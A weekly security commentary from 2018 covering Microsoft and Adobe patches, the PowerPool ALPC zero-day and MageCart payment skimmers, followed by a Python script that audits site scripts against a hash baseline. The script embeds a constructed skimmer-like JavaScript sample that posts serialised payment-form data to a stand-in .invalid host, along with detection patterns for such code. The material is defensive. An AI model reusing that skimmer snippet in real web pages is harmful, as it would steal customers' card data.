Weekly Comments

11 - 18 September 2018

Microsoft’s Patch Tuesday for September issued security updates addressing 61 vulnerabilities, 17 of which are rated critical. One of the most important fixes addresses a zero-day elevation-of-privilege vulnerability (CVE-2018-8440) that arises when Windows improperly handles calls to Advanced Local Procedure Call (ALPC). An attacker who is already able to run code on a machine, for example through malware delivered by phishing, can exploit the flaw to elevate to SYSTEM-level privileges and take full control of the targeted system. Prior to the patch, a threat group dubbed PowerPool had exploited the zero-day in the wild, targeting organisations in countries including the Philippines, India, Poland, Russia, the United Kingdom, and the United States.

Adobe also issued security updates addressing 10 vulnerabilities: one in Flash Player and nine in ColdFusion. The Flash Player update fixes a privilege escalation vulnerability (CVE-2018-15967), rated important by Adobe, that could lead to information disclosure. Six of the nine ColdFusion vulnerabilities are rated critical and could allow arbitrary code execution.

This week we also observed the ongoing and evolving online skimmer attacks carried out by a threat actor dubbed MageCart. Unlike the skimmer infection of Ticketmaster’s websites in June, the recent attacks on cloud service firm Feedify and on British Airways used customised skimmer scripts and purpose-built infrastructure to minimise detection and suspicion. This shows that MageCart is sharpening its tools and infrastructure and does not intend to call it a day any time soon. The group will likely continue to target poorly secured website administration accounts and the third-party scripts that sites load, seeking to covertly modify legitimate scripts so that malicious skimmer code is inserted into payment pages.

We advise organisations to secure website administration accounts with strong, unpredictable passwords and to stay vigilant for unusual login activity on these accounts. Website administrators should also regularly audit the code and scripts their sites serve, including third-party scripts loaded into payment pages, to spot fraudulent modification and the insertion of skimmer scripts. Keeping a baseline of known-good script hashes to compare against makes such modifications far easier to detect than reading the code by eye.
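As an added example (not code from the original commentary or from any of the organisations named), the following Python script shows the kind of audit the recommendation above describes: it records a SHA-256 baseline of the scripts a site serves, diffs the currently served copies against that baseline, and applies a simple heuristic to every changed or new script, flagging code that hooks the payment form, can send data off the page, and references a host outside an allow-list. The file contents, baseline, allow-list and the skimmer-like snippet are all constructed for illustration; the host it contacts is a reserved .invalid name and the snippet does not reproduce any real attack code.

```python
"""Baseline-and-diff audit of a site's JavaScript assets with a heuristic
check for skimmer-like code.

Added example, not from the original commentary. The asset contents, the
baseline and the allow-list below are constructed for illustration; the
skimmer-like snippet is hypothetical and the host it contacts is a
reserved .invalid name.
"""
import hashlib
import re


def sha256_hex(data: bytes) -> str:
    """Hex SHA-256 of a served asset, the unit stored in the baseline."""
    return hashlib.sha256(data).hexdigest()


# Constructed sample: the known-good baseline recorded after the last deploy.
BASELINE = {
    "js/modernizr.min.js": sha256_hex(b"window.Modernizr = {};"),
    "js/checkout.js": sha256_hex(b"function pay(){ return fetch('/api/pay'); }"),
}

# Constructed sample: what the web server serves now. modernizr.min.js has
# had a hypothetical skimmer appended that hooks the payment form and posts
# the serialised fields to an attacker-controlled host; analytics.js is new.
CURRENT = {
    "js/modernizr.min.js": (
        b"window.Modernizr = {};"
        b"document.getElementById('submitButton').addEventListener('mouseup', function(){"
        b"var d=JSON.stringify($('#paymentForm').serializeArray());"
        b"$.ajax({type:'POST',url:'https://example-skimmer.invalid/gateway/api',data:d});});"
    ),
    "js/checkout.js": b"function pay(){ return fetch('/api/pay'); }",
    "js/analytics.js": b"console.log('page view');",
}

# Hosts the site's own scripts are expected to reference (constructed).
ALLOWED_HOSTS = {"www.example.com", "cdn.example.com"}

# Absolute URLs in a script; the capture group is the host part.
URL_RE = re.compile(rb"https?://([A-Za-z0-9.-]+)")
# Code that hooks form submission, or the click/touch that triggers it.
FORM_HOOK_RE = re.compile(
    rb"addEventListener\s*\(\s*['\"](?:submit|mouseup|click|touchend)['\"]"
    rb"|serializeArray|\.onsubmit"
)
# Mechanisms that can send collected data off the page.
SEND_RE = re.compile(rb"\$\.ajax|XMLHttpRequest|fetch\s*\(|navigator\.sendBeacon|new Image")


def diff_against_baseline(baseline, current):
    """Classify each served asset as modified, added or removed relative to the baseline."""
    modified = sorted(p for p in current if p in baseline and sha256_hex(current[p]) != baseline[p])
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    return {"modified": modified, "added": added, "removed": removed}


def skimmer_indicators(src, allowed_hosts):
    """Heuristic indicators of a skimmer: the script hooks the payment form,
    can send data, and references a host outside the allow-list. All three
    together are required before a script is marked suspicious, which keeps
    ordinary analytics or first-party checkout code from being flagged."""
    hosts = {h.decode() for h in URL_RE.findall(src)}
    foreign = sorted(h for h in hosts if h not in allowed_hosts)
    hooks_form = FORM_HOOK_RE.search(src) is not None
    sends_data = SEND_RE.search(src) is not None
    return {
        "foreign_hosts": foreign,
        "hooks_form_events": hooks_form,
        "sends_data": sends_data,
        "suspicious": bool(foreign) and hooks_form and sends_data,
    }


def audit(baseline, current, allowed_hosts):
    """Diff against the baseline, then scan every changed or new script."""
    report = diff_against_baseline(baseline, current)
    report["flagged"] = {}
    for path in report["modified"] + report["added"]:
        indicators = skimmer_indicators(current[path], allowed_hosts)
        if indicators["suspicious"]:
            report["flagged"][path] = indicators
    return report


if __name__ == "__main__":
    result = audit(BASELINE, CURRENT, ALLOWED_HOSTS)
    for kind in ("modified", "added", "removed"):
        print(f"{kind}: {result[kind]}")
    for path, ind in result["flagged"].items():
        print(f"SUSPICIOUS {path}: hooks the form and posts to {ind['foreign_hosts']}")
```

In practice the CURRENT dictionary would be populated by fetching every script a payment page actually loads, third-party ones included, and the baseline regenerated at each deploy. The hash mismatch is the primary signal; the heuristic only ranks which changed files to read first, and a skimmer that uses an allow-listed host or an unusual exfiltration channel would still show up as a modified file even though it is not flagged.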

[1] Patch Tuesday: Microsoft plugs zero-day hole exploited by PowerPool
[2] PowerPool malware exploits ALPC LPE zero-day vulnerability
[3] Adobe September 2018 Security Updates Fix 6 Critical Vulnerabilities
